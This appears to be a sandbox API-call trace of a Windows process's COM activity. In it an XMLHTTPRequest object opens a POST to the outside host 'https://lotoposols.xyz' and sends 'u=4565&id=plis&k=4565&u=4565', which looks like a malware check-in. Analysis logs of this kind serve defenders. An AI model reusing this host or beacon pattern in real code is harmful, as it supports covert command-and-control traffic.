	[0171.822] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0171.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0171.823] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0171.823] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0171.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0171.823] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0171.823] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0171.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0171.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0171.823] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0171.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0171.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0171.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0171.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0171.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0171.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0171.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0171.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0171.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0171.825] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0171.825] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0171.825] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0171.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0171.825] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0171.828] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0171.828] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0171.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0171.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0171.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0171.829] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0171.829] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0171.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0171.830] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0171.830] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0171.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0171.830] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0171.830] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0171.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0171.830] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0171.831] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0171.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0171.831] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0171.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0171.831] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a41948 | out: ppvObject=0x5a41948*=0x0) returned 0x80004002
	[0171.831] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
